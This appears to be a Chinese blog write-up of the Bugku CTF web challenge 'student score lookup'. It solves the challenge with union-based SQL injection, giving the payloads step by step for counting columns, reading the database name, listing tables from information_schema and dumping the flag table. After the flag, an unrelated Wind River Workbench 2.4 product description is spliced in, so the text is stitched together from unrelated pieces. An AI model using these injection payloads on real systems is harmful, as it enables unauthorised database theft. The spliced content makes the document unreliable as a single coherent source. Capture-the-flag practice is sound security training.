Bugku Web CTF-学生成绩查询

Bugku Web CTF-学生成绩查询

该题解题思路是SQL注入,测试思路如下:。
直接输入’单引号没有回显;
输入’#有回显;
通过union来猜解该表有多少列:

0' union select 1,2,3,4#

可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。
获取数据库名:

0' union select 1,user(),database(),version()#

可得到数据库名为skctf_flag
知道了数据库名,从中获取表名:

0' union select 1,2,3,(select table_name from information_schema.tables where table_schema='skctf_flag' limit 1)#

拿到一个名为fl4g的表,直接获取表中数据:

0' union select 1,2,3,(select * from fl4g)#

(恰好fl4g表只有一行一列数据所以该语句能成功执行)最终拿到flagBUGKU{Sql_INJECT0N_4813drd8hz4}

风河 Workbench 产品介绍 风河 Workbench 是设备软件业首选的开放 式、基于标准的开发套件。通过其性能、集 成及实用性的强劲组合,Workbench 不仅能 使企业在通用环境下的设备软件开发更趋 标准化,而且还能够显著提高开发人员、项 目团队和企业的工作效率。 Workbench 提供了: * 开发过程的每一阶段都具有最佳性能,包 括硬件生成、固件开发、应用软件开发和测 试 * 强大的功能——目标击于设备软件开发 过程和测试过程的主要挑战 * 支持跨项目标准化的广泛实用性 - 多 目 标 操 作 系 统 支 持 , 包 括 对 VxWorks6.x、Linux 以及 ThreadX 的支持 - 目标机处理器支持 ARM、ColdFire、 IA/Pentium、MIPS、PowerPC、SH以及XScale 处理器 - 插件架构,可添加其它目标机操作系统、 目标机处理器以及目标机连接支持 * 基于 Eclipse 的可扩展框架——能够为可 裁剪性和完全用户化而无缝集成第三方和 专用内部插件 该开发套件使得开发人员和项目小组通过 提高生产效率而轻松应对各种挑战,它使得 软硬件开发人员能够密切协作,并满足了整 个企业间各种各样的开发需求。Workbench 还包括风河 20 余年的行业经验、全球级的 技术支持机构以及专业的服务小组等。 风河 Workbench 2.4 的新增内容 Workbench 2.4 包括了一些在提高开发小组 生产效率方面的重大新功能: * 一般 Workbench 增强: - 更新至了 Eclipse 3.1 - 编辑器代码折叠 - 重构支持源代码分析 - 支持远程编译 * VxWorks 平台集成 - 扩展的 VxWorks 6.2 处理器支持 - VxWorks 可裁剪性支持 - 基于 TIPC 的分布式调试能力 * Linux 平台集成 - 扩展的处理器支持 * 芯片级调试 - 扩展的处理器支持 - 用于 ARM、ColdFire、MIPS、PowerPC 以及 Xscale 的已知 VxWorks 芯片级调试 (VxWorks 5.5 和 VxWorks 6) * 新的 Workbench 产品 - 用于 VxWorks 的 Workbench Unit Tester * 显著降低了代码测试时间,并通过自动化 操作提高了一致性 * 支持单元测试和代码集成测试的集成能 力 * 测试的代码覆盖分析 - 用于 VxWorks 的 Workbench Diagnostics * 动态记录、诊断和纠正系统问题 * 能够添加有像 printf 功能的软件插桩,而 无需重新编译代码 * 当需要时,能用最小的系统负载采集充分 的诊断信息 * 通过分析 core file,以便能够更好的了解 故障原因 * 设计设备软件易测性 应用程序组件 风河 Workbench 2.4 提供了下述应用功能组 件: * Eclipse 框架 * 项目系统 * 编译系统 * 编辑器 * 源代码分析器 * 风河编译器 - 风河编译器(适合于和其它目标机操作系 统) - 风河 GNU 编译器(适合于 VxWorks 和风 河 Linux 平台) * 风河调试器
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值